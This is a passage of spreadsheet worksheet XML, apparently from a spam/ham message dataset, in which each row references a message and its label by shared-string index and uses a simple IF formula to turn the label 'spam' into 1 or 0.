    <row r="5091" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5091" t="s">
        <v>10040</v>
      </c>
      <c r="B5091" t="s">
        <v>5294</v>
      </c>
      <c r="C5091" s="1">
        <f>IF(B5091="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5092" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5092" t="s">
        <v>10041</v>
      </c>
      <c r="B5092" t="s">
        <v>5294</v>
      </c>
      <c r="C5092" s="1">
        <f>IF(B5092="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5093" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5093" t="s">
        <v>5432</v>
      </c>
      <c r="B5093" t="s">
        <v>5294</v>
      </c>
      <c r="C5093" s="1">
        <f>IF(B5093="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5094" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5094" t="s">
        <v>10042</v>
      </c>
      <c r="B5094" t="s">
        <v>5294</v>
      </c>
      <c r="C5094" s="1">
        <f>IF(B5094="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5095" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5095" t="s">
        <v>10043</v>
      </c>
      <c r="B5095" t="s">
        <v>5294</v>
      </c>
      <c r="C5095" s="1">
        <f>IF(B5095="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5096" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5096" t="s">
        <v>10044</v>
      </c>
      <c r="B5096" t="s">
        <v>5294</v>
      </c>
      <c r="C5096" s="1">
        <f>IF(B5096="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5097" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5097" t="s">
        <v>10045</v>
      </c>
      <c r="B5097" t="s">
        <v>5294</v>
      </c>
      <c r="C5097" s="1">
        <f>IF(B5097="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5098" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5098" t="s">
        <v>10046</v>
      </c>
      <c r="B5098" t="s">
        <v>5294</v>
      </c>
      <c r="C5098" s="1">
        <f>IF(B5098="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5099" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5099" t="s">
        <v>10047</v>
      </c>
      <c r="B5099" t="s">
        <v>5294</v>
      </c>
      <c r="C5099" s="1">
        <f>IF(B5099="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5100" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5100" t="s">
        <v>10048</v>
      </c>
      <c r="B5100" t="s">
        <v>5297</v>
      </c>
      <c r="C5100" s="1">
        <f>IF(B5100="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="5101" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5101" t="s">
        <v>10049</v>
      </c>
      <c r="B5101" t="s">
        <v>5294</v>
      </c>
      <c r="C5101" s="1">
        <f>IF(B5101="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5102" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5102" t="s">
        <v>10050</v>
      </c>
      <c r="B5102" t="s">
        <v>5294</v>
      </c>
      <c r="C5102" s="1">
        <f>IF(B5102="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5103" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5103" t="s">
        <v>10051</v>
      </c>
      <c r="B5103" t="s">
        <v>5294</v>
      </c>
      <c r="C5103" s="1">
        <f>IF(B5103="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5104" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5104" t="s">
        <v>10052</v>
      </c>
      <c r="B5104" t="s">
        <v>5297</v>
      </c>
      <c r="C5104" s="1">
        <f>IF(B5104="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="5105" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5105" t="s">
        <v>10053</v>
      </c>
      <c r="B5105" t="s">
        <v>5294</v>
      </c>
      <c r="C5105" s="1">
        <f>IF(B5105="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5106" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5106" t="s">
        <v>7567</v>
      </c>
      <c r="B5106" t="s">
        <v>5294</v>
      </c>
      <c r="C5106" s="1">
        <f>IF(B5106="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5107" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5107" t="s">
        <v>5718</v>
      </c>
      <c r="B5107" t="s">
        <v>5294</v>
      </c>
      <c r="C5107" s="1">
        <f>IF(B5107="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5108" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5108" t="s">
        <v>10054</v>
      </c>
      <c r="B5108" t="s">
        <v>5294</v>
      </c>
      <c r="C5108" s="1">
        <f>IF(B5108="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5109" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5109" t="s">
        <v>10055</v>
      </c>
      <c r="B5109" t="s">
        <v>5294</v>
      </c>
      <c r="C5109" s="1">
        <f>IF(B5109="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5110" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5110" t="s">
        <v>8671</v>
      </c>
      <c r="B5110" t="s">
        <v>5294</v>
      </c>
      <c r="C5110" s="1">
        <f>IF(B5110="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5111" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5111" t="s">
        <v>10056</v>
      </c>
      <c r="B5111" t="s">
        <v>5294</v>
      </c>
      <c r="C5111" s="1">
        <f>IF(B5111="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5112" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5112" t="s">
        <v>10057</v>
      </c>
      <c r="B5112" t="s">
        <v>5297</v>
      </c>
      <c r="C5112" s="1">
        <f>IF(B5112="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="5113" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5113" t="s">
        <v>10058</v>
      </c>
      <c r="B5113" t="s">
        <v>5294</v>
      </c>
      <c r="C5113" s="1">
        <f>IF(B5113="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5114" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5114" t="s">
        <v>10059</v>
      </c>
      <c r="B5114" t="s">
        <v>5297</v>
      </c>
      <c r="C5114" s="1">
        <f>IF(B5114="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="5115" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5115" t="s">
        <v>10060</v>
      </c>
      <c r="B5115" t="s">
        <v>5294</v>
      </c>
      <c r="C5115" s="1">
        <f>IF(B5115="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5116" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5116" t="s">
        <v>10061</v>
      </c>
      <c r="B5116" t="s">
        <v>5294</v>
      </c>
      <c r="C5116" s="1">
        <f>IF(B5116="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5117" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5117" t="s">
        <v>10062</v>
      </c>
      <c r="B5117" t="s">
        <v>5297</v>
      </c>
      <c r="C5117" s="1">
        <f>IF(B5117="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="5118" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5118" t="s">
        <v>10063</v>
      </c>
      <c r="B5118" t="s">
        <v>5294</v>
      </c>
      <c r="C5118" s="1">
        <f>IF(B5118="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5119" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5119" t="s">
        <v>10064</v>
      </c>
      <c r="B5119" t="s">
        <v>5294</v>
      </c>
      <c r="C5119" s="1">
        <f>IF(B5119="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5120" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5120" t="s">
        <v>10065</v>
      </c>
      <c r="B5120" t="s">
        <v>5294</v>
      </c>
      <c r="C5120" s="1">
        <f>IF(B5120="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5121" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5121" t="s">
        <v>10066</v>
      </c>
      <c r="B5121" t="s">
        <v>5294</v>
      </c>
      <c r="C5121" s="1">
        <f>IF(B5121="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5122" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5122" t="s">
        <v>10067</v>
      </c>
      <c r="B5122" t="s">
        <v>5297</v>
      </c>
      <c r="C5122" s="1">
        <f>IF(B5122="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="5123" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5123" t="s">
        <v>10068</v>
      </c>
      <c r="B5123" t="s">
        <v>5294</v>
      </c>
      <c r="C5123" s="1">
        <f>IF(B5123="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5124" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5124" t="s">
        <v>10069</v>
      </c>
      <c r="B5124" t="s">
        <v>5294</v>
      </c>
      <c r="C5124" s="1">
        <f>IF(B5124="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5125" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5125" t="s">
        <v>10070</v>
      </c>
      <c r="B5125" t="s">
        <v>5294</v>
      </c>
      <c r="C5125" s="1">
        <f>IF(B5125="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5126" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5126" t="s">
        <v>10071</v>
      </c>
      <c r="B5126" t="s">
        <v>5294</v>
      </c>
      <c r="C5126" s="1">
        <f>IF(B5126="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5127" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5127" t="s">
        <v>10072</v>
      </c>
      <c r="B5127" t="s">
        <v>5294</v>
      </c>
      <c r="C5127" s="1">
        <f>IF(B5127="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5128" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5128" t="s">
        <v>10073</v>
      </c>
      <c r="B5128" t="s">
        <v>5294</v>
      </c>
      <c r="C5128" s="1">
        <f>IF(B5128="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5129" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5129" t="s">
        <v>10074</v>
      </c>
      <c r="B5129" t="s">
        <v>5294</v>
      </c>
      <c r="C5129" s="1">
        <f>IF(B5129="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5130" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5130" t="s">
        <v>10075</v>
      </c>
      <c r="B5130" t="s">
        <v>5294</v>
      </c>
      <c r="C5130" s="1">
        <f>IF(B5130="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5131" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5131" t="s">
        <v>8351</v>
      </c>
      <c r="B5131" t="s">
        <v>5294</v>
      </c>
      <c r="C5131" s="1">
        <f>IF(B5131="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5132" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5132" t="s">
        <v>10076</v>
      </c>
      <c r="B5132" t="s">
        <v>5294</v>
      </c>
      <c r="C5132" s="1">
        <f>IF(B5132="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5133" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5133" t="s">
        <v>10077</v>
      </c>
      <c r="B5133" t="s">
        <v>5294</v>
      </c>
      <c r="C5133" s="1">
        <f>IF(B5133="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5134" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5134" t="s">
        <v>10078</v>
      </c>
      <c r="B5134" t="s">
        <v>5294</v>
      </c>
      <c r="C5134" s="1">
        <f>IF(B5134="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5135" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5135" t="s">
        <v>10079</v>
      </c>
      <c r="B5135" t="s">
        <v>5294</v>
      </c>
      <c r="C5135" s="1">
        <f>IF(B5135="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5136" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5136" t="s">
        <v>10080</v>
      </c>
      <c r="B5136" t="s">
        <v>5294</v>
      </c>
      <c r="C5136" s="1">
        <f>IF(B5136="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5137" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5137" t="s">
        <v>10081</v>
      </c>
      <c r="B5137" t="s">
        <v>5294</v>
      </c>
      <c r="C5137" s="1">
        <f>IF(B5137="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5138" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5138" t="s">
        <v>10082</v>
      </c>
      <c r="B5138" t="s">
        <v>5294</v>
      </c>
      <c r="C5138" s="1">
        <f>IF(B5138="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5139" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5139" t="s">
        <v>10083</v>
      </c>
      <c r="B5139" t="s">
        <v>5297</v>
      </c>
      <c r="C5139" s="1">
        <f>IF(B5139="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="5140" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5140" t="s">
        <v>10084</v>
      </c>
      <c r="B5140" t="s">
        <v>5294</v>
      </c>
      <c r="C5140" s="1">
        <f>IF(B5140="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5141" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5141" t="s">
        <v>10085</v>
      </c>
      <c r="B5141" t="s">
        <v>5294</v>
      </c>
      <c r="C5141" s="1">
        <f>IF(B5141="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5142" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5142" t="s">
        <v>10086</v>
      </c>
      <c r="B5142" t="s">
        <v>5294</v>
      </c>
      <c r="C5142" s="1">
        <f>IF(B5142="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5143" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5143" t="s">
        <v>6081</v>
      </c>
      <c r="B5143" t="s">
        <v>5297</v>
      </c>
      <c r="C5143" s="1">
        <f>IF(B5143="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="5144" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5144" t="s">
        <v>10087</v>
      </c>
      <c r="B5144" t="s">
        <v>5294</v>
      </c>
      <c r="C5144" s="1">
        <f>IF(B5144="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5145" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5145" t="s">
        <v>10088</v>
      </c>
      <c r="B5145" t="s">
        <v>5294</v>
      </c>
      <c r="C5145" s="1">
        <f>IF(B5145="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5146" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5146" t="s">
        <v>10089</v>
      </c>
      <c r="B5146" t="s">
        <v>5294</v>
      </c>
      <c r="C5146" s="1">
        <f>IF(B5146="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5147" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5147" t="s">
        <v>10090</v>
      </c>
      <c r="B5147" t="s">
        <v>5294</v>
      </c>
      <c r="C5147" s="1">
        <f>IF(B5147="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5148" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5148" t="s">
        <v>10091</v>
      </c>
      <c r="B5148" t="s">
        <v>5294</v>
      </c>
      <c r="C5148" s="1">
        <f>IF(B5148="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5149" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5149" t="s">
        <v>10092</v>
      </c>
      <c r="B5149" t="s">
        <v>5297</v>
      </c>
      <c r="C5149" s="1">
        <f>IF(B5149="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="5150" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5150" t="s">
        <v>10093</v>
      </c>
      <c r="B5150" t="s">
        <v>5294</v>
      </c>
      <c r="C5150" s="1">
        <f>IF(B5150="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5151" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5151" t="s">
        <v>10094</v>
      </c>
      <c r="B5151" t="s">
        <v>5294</v>
      </c>
      <c r="C5151" s="1">
        <f>IF(B5151="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5152" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5152" t="s">
        <v>10095</v>
      </c>
      <c r="B5152" t="s">
        <v>5294</v>
      </c>
      <c r="C5152" s="1">
        <f>IF(B5152="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5153" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5153" t="s">
        <v>10096</v>
      </c>
      <c r="B5153" t="s">
        <v>5294</v>
      </c>
      <c r="C5153" s="1">
        <f>IF(B5153="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5154" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5154" t="s">
        <v>10097</v>
      </c>
      <c r="B5154" t="s">
        <v>5294</v>
      </c>
      <c r="C5154" s="1">
        <f>IF(B5154="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5155" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5155" t="s">
        <v>10098</v>
      </c>
      <c r="B5155" t="s">
        <v>5294</v>
      </c>
      <c r="C5155" s="1">
        <f>IF(B5155="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5156" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5156" t="s">
        <v>10099</v>
      </c>
      <c r="B5156" t="s">
        <v>5294</v>
      </c>
      <c r="C5156" s="1">
        <f>IF(B5156="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5157" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5157" t="s">
        <v>10100</v>
      </c>
      <c r="B5157" t="s">
        <v>5294</v>
      </c>
      <c r="C5157" s="1">
        <f>IF(B5157="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5158" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5158" t="s">
        <v>10101</v>
      </c>
      <c r="B5158" t="s">
        <v>5294</v>
      </c>
      <c r="C5158" s="1">
        <f>IF(B5158="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5159" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5159" t="s">
        <v>10102</v>
      </c>
      <c r="B5159" t="s">
        <v>5294</v>
      </c>
      <c r="C5159" s="1">
        <f>IF(B5159="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5160" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5160" t="s">
        <v>10103</v>
      </c>
      <c r="B5160" t="s">
        <v>5294</v>
      </c>
      <c r="C5160" s="1">
        <f>IF(B5160="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5161" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5161" t="s">
        <v>10104</v>
      </c>
      <c r="B5161" t="s">
        <v>5294</v>
      </c>
      <c r="C5161" s="1">
        <f>IF(B5161="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5162" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5162" t="s">
        <v>10105</v>
      </c>
      <c r="B5162" t="s">
        <v>5294</v>
      </c>
      <c r="C5162" s="1">
        <f>IF(B5162="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5163" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5163" t="s">
        <v>10106</v>
      </c>
      <c r="B5163" t="s">
        <v>5294</v>
      </c>
      <c r="C5163" s="1">
        <f>IF(B5163="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5164" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5164" t="s">
        <v>10107</v>
      </c>
      <c r="B5164" t="s">
        <v>5294</v>
      </c>
      <c r="C5164" s="1">
        <f>IF(B5164="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5165" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5165" t="s">
        <v>10108</v>
      </c>
      <c r="B5165" t="s">
        <v>5294</v>
      </c>
      <c r="C5165" s="1">
        <f>IF(B5165="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5166" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5166" t="s">
        <v>7758</v>
      </c>
      <c r="B5166" t="s">
        <v>5297</v>
      </c>
      <c r="C5166" s="1">
        <f>IF(B5166="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="5167" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5167" t="s">
        <v>10109</v>
      </c>
      <c r="B5167" t="s">
        <v>5294</v>
      </c>
      <c r="C5167" s="1">
        <f>IF(B5167="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5168" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5168" t="s">
        <v>10110</v>
      </c>
      <c r="B5168" t="s">
        <v>5294</v>
      </c>
      <c r="C5168" s="1">
        <f>IF(B5168="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5169" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5169" t="s">
        <v>10111</v>
      </c>
      <c r="B5169" t="s">
        <v>5294</v>
      </c>
      <c r="C5169" s="1">
        <f>IF(B5169="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5170" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5170" t="s">
        <v>10112</v>
      </c>
      <c r="B5170" t="s">
        <v>5294</v>
      </c>
      <c r="C5170" s="1">
        <f>IF(B5170="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5171" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5171" t="s">
        <v>10113</v>
      </c>
      <c r="B5171" t="s">
        <v>5294</v>
      </c>
      <c r="C5171" s="1">
        <f>IF(B5171="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5172" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5172" t="s">
        <v>10114</v>
      </c>
      <c r="B5172" t="s">
        <v>5294</v>
      </c>
      <c r="C5172" s="1">
        <f>IF(B5172="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5173" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5173" t="s">
        <v>9963</v>
      </c>
      <c r="B5173" t="s">
        <v>5294</v>
      </c>
      <c r="C5173" s="1">
        <f>IF(B5173="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5174" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5174" t="s">
        <v>10115</v>
      </c>
      <c r="B5174" t="s">
        <v>5294</v>
      </c>
      <c r="C5174" s="1">
        <f>IF(B5174="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5175" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5175" t="s">
        <v>10116</v>
      </c>
      <c r="B5175" t="s">
        <v>5294</v>
      </c>
      <c r="C5175" s="1">
        <f>IF(B5175="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5176" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5176" t="s">
        <v>10117</v>
      </c>
      <c r="B5176" t="s">
        <v>5294</v>
      </c>
      <c r="C5176" s="1">
        <f>IF(B5176="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5177" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5177" t="s">
        <v>7415</v>
      </c>
      <c r="B5177" t="s">
        <v>5294</v>
      </c>
      <c r="C5177" s="1">
        <f>IF(B5177="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5178" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5178" t="s">
        <v>7733</v>
      </c>
      <c r="B5178" t="s">
        <v>5294</v>
      </c>
      <c r="C5178" s="1">
        <f>IF(B5178="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5179" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5179" t="s">
        <v>10118</v>
      </c>
      <c r="B5179" t="s">
        <v>5294</v>
      </c>
      <c r="C5179" s="1">
        <f>IF(B5179="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5180" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5180" t="s">
        <v>10119</v>
      </c>
      <c r="B5180" t="s">
        <v>5297</v>
      </c>
      <c r="C5180" s="1">
        <f>IF(B5180="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="5181" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5181" t="s">
        <v>10120</v>
      </c>
      <c r="B5181" t="s">
        <v>5294</v>
      </c>
      <c r="C5181" s="1">
        <f>IF(B5181="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5182" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5182" t="s">
        <v>10121</v>
      </c>
      <c r="B5182" t="s">
        <v>5294</v>
      </c>
      <c r="C5182" s="1">
        <f>IF(B5182="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5183" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5183" t="s">
        <v>10122</v>
      </c>
      <c r="B5183" t="s">
        <v>5294</v>
      </c>
      <c r="C5183" s="1">
        <f>IF(B5183="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5184" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5184" t="s">
        <v>9457</v>
      </c>
      <c r="B5184" t="s">
        <v>5294</v>
      </c>
      <c r="C5184" s="1">
        <f>IF(B5184="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5185" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5185" t="s">
        <v>10123</v>
      </c>
      <c r="B5185" t="s">
        <v>5294</v>
      </c>
      <c r="C5185" s="1">
        <f>IF(B5185="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5186" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5186" t="s">
        <v>10124</v>
      </c>
      <c r="B5186" t="s">
        <v>5294</v>
      </c>
      <c r="C5186" s="1">
        <f>IF(B5186="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5187" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5187" t="s">
        <v>10125</v>
      </c>
      <c r="B5187" t="s">
        <v>5294</v>
      </c>
      <c r="C5187" s="1">
        <f>IF(B5187="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5188" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5188" t="s">
        <v>10126</v>
      </c>
      <c r="B5188" t="s">
        <v>5294</v>
      </c>
      <c r="C5188" s="1">
        <f>IF(B5188="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5189" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5189" t="s">
        <v>10127</v>
      </c>
      <c r="B5189" t="s">
        <v>5294</v>
      </c>
      <c r="C5189" s="1">
        <f>IF(B5189="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5190" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5190" t="s">
        <v>7785</v>
      </c>
      <c r="B5190" t="s">
        <v>5294</v>
      </c>
      <c r="C5190" s="1">
        <f>IF(B5190="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5191" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5191" t="s">
        <v>10128</v>
      </c>
      <c r="B5191" t="s">
        <v>5297</v>
      </c>
      <c r="C5191" s="1">
        <f>IF(B5191="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="5192" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5192" t="s">
        <v>10129</v>
      </c>
      <c r="B5192" t="s">
        <v>5297</v>
      </c>
      <c r="C5192" s="1">
        <f>IF(B5192="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="5193" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5193" t="s">
        <v>5376</v>
      </c>
      <c r="B5193" t="s">
        <v>5294</v>
      </c>
      <c r="C5193" s="1">
        <f>IF(B5193="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5194" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5194" t="s">
        <v>10130</v>
      </c>
      <c r="B5194" t="s">
        <v>5294</v>
      </c>
      <c r="C5194" s="1">
        <f>IF(B5194="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
